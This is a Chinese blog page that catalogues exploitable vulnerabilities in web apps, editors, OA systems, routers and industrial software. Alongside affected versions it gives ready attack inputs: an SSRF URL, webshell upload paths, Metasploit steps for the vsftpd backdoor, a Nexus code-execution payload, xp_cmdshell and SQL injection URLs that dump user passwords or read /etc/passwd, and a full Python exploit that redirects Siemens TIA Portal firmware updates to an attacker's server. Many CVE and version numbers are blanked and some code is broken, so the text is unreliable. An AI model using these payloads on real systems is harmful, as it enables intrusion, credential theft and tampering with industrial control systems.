jira

ssrf  CVE-2019-8451
url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/'

Jira未授权服务端模板注入远程代码执行漏洞(CVE-2019-11581)

Ueditor

任意文件上传

uchome

uchome 2.0 存在持久XSS漏洞

发布时间:--

在uchome 简体utf- .0测试IE6,IE7,IE8通过.

@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.

分析代码 cp_theme.php 92行(17行调用)

Edge

Microsoft Edge 远程代码执行漏洞(CVE--)

大华摄像头

未授权访问漏洞

受影响:

DH-IPC-HDW23A0RN-ZS

DH-IPC-HDBW23A0RN-ZS

DH-IPC-HDBW13A0SN

DH-IPC-HDW13A0SN

DH-IPC-HFW13A0SN-W

DH-IPC-HDBW13A0SN

DH-IPC-HDW13A0SN

DH-IPC-HFW13A0SN-W

DHI-HCVR51A04HE-S3

DHI-HCVR51A08HE-S3

DHI-HCVR58A32S-S2

Exim邮件服务器

Exim deliver_message命令注入漏洞(CVE--)

DeleGate 

DeleGate DNS消息解压远程拒绝服务漏洞 CVE-2005-0036

Fastjson

RCE

Fastjson < V1.2.48

Spring

Pivotal Spring Framework isWritableProperty SpEL 表达式注入漏洞(CVE--)

CVE--

ImageMagick

RCE

CVE--

axis2

弱口令

任意文件读取

Awstats

路径泄露

http://www.xx.com.cn/cgi-bin/awstats.pl?config=xxx

ccs

注入

ISC BIND 

TSIG缓冲区溢出漏洞

拒绝服务漏洞(CVE-2014-8500)

拒绝服务漏洞(cnvd-2018-17514)

ISC BIND安全限制绕过漏洞(CVE-2017-3143)

HFS

RCE

PHP

PHP7 zip组件整型溢出漏洞(CVE--) - > 可RCE - 影响范围是PHP 7.0.6版本以前的所有PHP 7.x 版本

phpmyadmin

弱口令

phpmoadmin

RCE

node.js

node.js v8 debugger RCE


Elasticsearch

RCE

未授权访问

任意文件读取

OpenSSLDrown

OpenSSL 1.0. through

1.0.1g OpenSSL 1.0. through 1.0.0l all versions before OpenSSL 0.9.8y

DROWN攻击漏洞(CVE--)

Openssh

libssh认证绕过(cve--

ibssh 0.8.x - 0.8.

libssh 0.7.x - 0.7.

libssh 0.6.x"

Netgear

Netgear DGN1000B setup.cgi 远程命令注入漏洞

Bash

破壳漏洞(CVE--)

影响:

影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X .10等平台

Kubernetes

Kubernetes Kubernetes提权(CVE--)

Kubernetes v1..x-1.9.x Kubernetes v1.10.0-1.10. (fixed in v1.10.11)

Kubernetes v1.11.0-1.11. (fixed in v1.11.5) Kubernetes v1.12.0-1.12. (fixed in v1.12.3)

zabbix 

latest sql注入漏洞

jsrpc sql注入漏洞

activemq

后台弱口令

RCE

任意文件上传

ActiveMQ物理路径泄漏

Fckeditor

https://www.jianshu.com/p/b0295978da77/fckeditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

http://x.com/goldpen/editor/filemanager/browser/default/  #泄露源码文件

上传漏洞
http://www.xx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html
访问进去直接上传图片格式木马。
http://www.xx.gov.cn/UploadFile/2.php;.gif

KingdEditor

XSS

上传漏洞

CuteEDitor

上传漏洞
编辑器Aspx版本

网上公布的CuteEditor漏洞,配合利用IIS .0解析漏洞获取Webshell

WAF防火墙免疫IIS6.0解析漏洞 -> 修改图片后缀绕过

Apache

Apache ActiveMQ .x ~ 5.14.

ActiveMQ任意文件文件移动漏洞

Apache ActiveMQ 5.13.0的版本之前的存在反序列化漏洞

ActiveMQ反序列化漏洞(CVE--)

Apache ActiveMQ5.14.0 – 5.15.

ActiveMQ 信息泄漏漏洞(CVE--)

apache mod_jk    apache mod_jk访问控制绕过漏洞(cve-2018-11759)


61616端口(ActiveMQ消息队列端口)

hudson

代码泄露

grafana

弱口令


Openssh






 CVE--

 CVE--

 CVE--

 CVE--

 CVE--

 CVE--

 CVE--

 CVE--

 CVE--(提权)






Atlassian






 CVE-2019-1158






docker






 CVE-2018-15664






Siemens TIA Portal (STEP7) 


RCE : CVE-2019-10915






 ##

 # Exploit Title: Siemens TIA Portal remote command execution

 # Date: 06/11/2019

 # Exploit Author: Joseph Bingham

 # CVE : CVE-2019-10915

 # Advisory: https://www.tenable.com/security/research/tra-2019-33

 # Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a

 # Affected Vendors/Device/Firmware:

 #  - Siemens STEP7 / TIA Portal

 ##

 ##

 # Example usage

 # $ python cve_2019_10915_tia_portal_rce.py

 # Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'

 # Received '40'

 # Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'

 ##

 import websocket, ssl, argparse

 parser = argparse.ArgumentParser()

 parser.add_argument("target_host", help="TIA Portal host")

 parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)

 parser.add_argument("update_server", help="Malicious firmware update server IP")

 args = parser.parse_args()

 host = args.target_host

 port = args.target_port

 updatesrv = args.update_server

 ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})

 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'

 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'

 req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'

 ws.send(req)

 result = ws.recv()

 print("Received '%s'" % result)

 result = ws.recv()

 print("Received '%s'" % result)

 result = ws.recv()

 print("Received '%s'" % result)






 WinRAR


CVE-2018-2025(WinRAR RCE)






 影响范围:

 WinRAR < 5.70 Beta 1

 Bandizip    < = 6.2.0.0

 好压(2345压缩)    < = 5.9.8.10907

 360压缩    < = 4.0.0.1170






ghostscript






 影响的版本 <= 9.23(全版本、全平台)






CVE-2017-8291






 Ghostscript Ghostscript < 2017-04-26






 Flash


CVE-2018-4878






 项目地址:https://github.com/Sch01ar/CVE-2018-4878.git

 影响版本为:Adobe Flash Player <= 28.0.0.137






 Office


CVE-2017-11882(RCE)






 漏洞影响版本:

 Office 365

 Microsoft Office 2000

 Microsoft Office 2003

 Microsoft Office 2007 Service Pack 3

 Microsoft Office 2010 Service Pack 2

 Microsoft Office 2013 Service Pack 1

 Microsoft Office 2016






vsftpd






 vsftpd 2.3. - 笑脸漏洞

 msfconsole

 search vsftpd

 use exploit/unix/ftp/vsftpd_234_backdoor

 set rhost IP

 run






memcache




常用端口

未授权访问


memcache     memcache drdos漏洞( B6-2018-030102)

1.4.31    memcache     Memcached  Append/prepend 远程代码执行漏洞(CVE-2016-8704)

1.4.31    memcache     Memcache  Update 远程代码执行漏洞(CVE-2016-8705)

1.4.31    memcache     Memcache  SASL身份验证远程代码执行漏洞(CVE-2016-8706)


 




jenkins




常用端口

未授权访问

反序列化

cve--

CVE--




GeoServer




1.弱口令


Javascript is required to actually use the GeoServer admin console. - 网站没有添加到可信任站点


2.XXE(版本小于2.7.1.1)




 ccproxy




ccproxy6.0远程溢出




solr




未授权访问

CVE--12629 XXE & RCE

CVE--0193 RCE




Secure File Transfe




version <= 0.18

CVE--

CVE-- 

version <= 0.20

CVE--

CVE--

CVE--

CVE--




Kibana




Elasticsearch Kibana本地文件包含漏洞(CVE--)




SCOoffice 




SCOoffice Server "STARTTLS"纯文本注入漏洞




LIVE555




LIVE555 RTSP服务器缓冲区溢出漏洞(CVE--) -》 RCE




Ruby on Rails 




Ruby on Rails 路径穿越与任意文件读取(CVE--)




Systemd




Systemd dns_packet_new函数堆缓冲区远程溢出漏洞 CVE--

影响范围:

Systemd 版本223,该版本早于  年  月,其后还包括  年  月 发布的Systemd 版本 

该漏洞影响 Ubuntu 17.04 版和 16.10 版 ; Debian 版本 Stretch(又名Debian ),Buster(又名10)和 Sid(又名Unstable); 以及使用 Systemd 的各种其他 Linux 发行版





D-Link 




D-Link DSL-2750B任意命令执行漏洞





金山安全套装




ksapi.sys对关键位置未保护,导致绕过限制




webTextbox编辑器




cookie欺骗




WebEditor




任意文件上传

http://nel.xx.com//main/model/newsoperation/webEditor/eWebEditor.jsp




GPON路由器




验证绕过漏洞(CVE--)

命令注入漏洞(CVE--)




Advantech Studio




Advantech Studio NTWebServer任意文件访问漏洞

受影响:

Advantech Advantech Studio 7.0




Nexus




CVE--7238
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositioryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":10}






 通达OA




Office Anywhere 网络智能办公系统

路径泄漏问题,可以不需要权限登录到phpmyadmin 且权限为root

/mysql/main.php




源天OA




RCE

http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27




禅道


禅道 11.6.2

越权

http://127.0.0.1/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin

注入

http://127.0.0.1/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

任意文件读取

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd


RCE






类型:

SQL注入

影响范围:

禅道9版本

前置条件:

/module/api/model.php

payload:
/zentao/api-getModel-api-sql-sql=select+account+from+zt_user




FasterXML 




Jackson-databind

     CVE-2019-12384(RCE)

        受影响版本

        Jackson-databind 2.X < 2.9.9.1

        不受影响版本

        Jackson-databind 2.9.9.1

        Jackson-databind 2.10


												


											
应用安全-软件安全-漏洞CVE整理的更多相关文章
	

    
								
  1. dedecms (织梦)漏洞&exp整理
		
    [通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /p ...
    
		
    2. 
						
  2. struts2远程代码执行漏洞汇总整理
		
    一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
    
		
    3. 
						
  3. 7. IIS短文件/文件夹漏洞(汇总整理)
		
    漏洞的成因与分析: 1)利用“~”字符猜解暴露短文件/文件夹名. 2).Net Framework的拒绝服务攻击. 现在看大部分的分析讨论都是第一个的.第二个比较少.这里简单复述一下其他研究人员的分析 ...
    
		
    4. 
						
  4. Windows系统CVE整理
		
    CVE-2018-8420(RCE) 受影响版本: Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10  ...
    
		
    5. 
						
  5. 常见web漏洞的整理之SQL注入
		
    SQL注入: 简介: 全称Structured Query Language,即结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言.也被作为关系式数据库管理系统的标准语言. 原理:  ...
    
		
    6. 
						
  6. 漏洞CVE 2017-8464
		
    概述 微软的Patch Tuesday更新发布了多达95个针对Windows.Office.Skype.IE和Edge浏览器的补丁.其中27个涉及远程代码执行,18个补丁被微软设定为严重(Critic ...
    
		
    7. 
						
  7. 远控CVE整理
		
    Windows: CVE-2017-8464(通过快捷方式,可U盘/共享等途径传播)
    
		
    8. 
						
  8. CVE补丁安全漏洞【学习笔记】
		
    更新安卓系统的CVE补丁网站:https://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/version ...
    
		
    9. 
						
  9. Fortify漏洞之Sql Injection(sql注入)
		
    公司最近启用了Fortify扫描项目代码,报出较多的漏洞,安排了本人进行修复,近段时间将对修复的过程和一些修复的漏洞总结整理于此! 本篇先对Fortify做个简单的认识,同时总结一下sql注入的漏洞! ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 2019-11-28-win10-uwp-提示-Cannot-find-a-Resource-with-the-Name-Key-找不到资源
			
    title author date CreateTime categories win10 uwp 提示 Cannot find a Resource with the Name Key 找不到资源  ...
    
			
    2. 
						
  2. 伟大的GIL
			
    GIL 首先需要明确的一点是GIL并不是Python的特性,它是在实现Python解析器(CPython)时所引入的一个概念.就好比C++是一套语言(语法)标准,但是可以用不同的编译器来编译成可执行代 ...
    
			
    3. 
						
  3. springboot之学习搭建
			
    什么是**SpringBoot?** Spring Boot 是由 Pivotal 团队提供的全新框架,其设计目的是用来简化新 Spring 应用的初始搭建以及开发过程.该框架使用了特定的方式来进行配 ...
    
			
    4. 
						
  4. set -xv
			
    1.set -x 或set xtrace 会显示+以及脚本中的内容(执行的部分,没执行的不显示) set -xv(脚本中所有的内容都显示,包括没执行的部分) 2.debug=3   //多层级调试 t ...
    
			
    5. 
						
  5. MYSQL数据导出与导入,secure_file_priv参数设置
			
    https://www.imooc.com/article/41883 MySQL 报错 [Code: 1290, SQL State: HY000]  The MySQL server is run ...
    
			
    6. 
						
  6. 超级POM
			
    在一个有POM的文件夹下执行: mvn help:effective-pom 会输出一个超级POM文件,可以就该文件,进行分析.
    
			
    7. 
						
  7. C++ GUI Qt4学习笔记07
			
    C++ GUI Qt4   qtc++scrollobject编程 事件(event)是由串口系统或者Qt自身产生的,用以响应所发生的各类事情.当用户按下或者松开键盘或者鼠标上的按键时,就可以产生一个 ...
    
			
    8. 
						
  8. 对15号夏壹队的TD信息通使用体验
			
    对夏壹队的APP的用户使用体验:首先下载的时候看到这个APP的大小是6M多点不算很大感觉还不错,但是占内存不大也说明了一个问题,它不会有很多的功能. 图标是一个蜜蜂,打开后会有一个登陆界面,一开始没有 ...
    
			
    9. 
						
  9. Rosetta Stone 不在C盘安装步骤
			
    本文出自:http://www.cnblogs.com/2186009311CFF/p/7500637.html Rosetta Stone默认安装在C盘的,很不好,故找到次解决方案: 总体就是移动文 ...
    
			
    10. 
						
  10. scanf()函数原理
			
    一.三点说明 1.用户输入的字符,会以ASCII码形式存储在键盘缓冲区:2.每调用一次scanf函数,就从键盘缓冲区读走一个字符,相当于清除缓冲区:3.若用户一次输入n个字符,则前n次调用scanf函 ...
    
			
    11.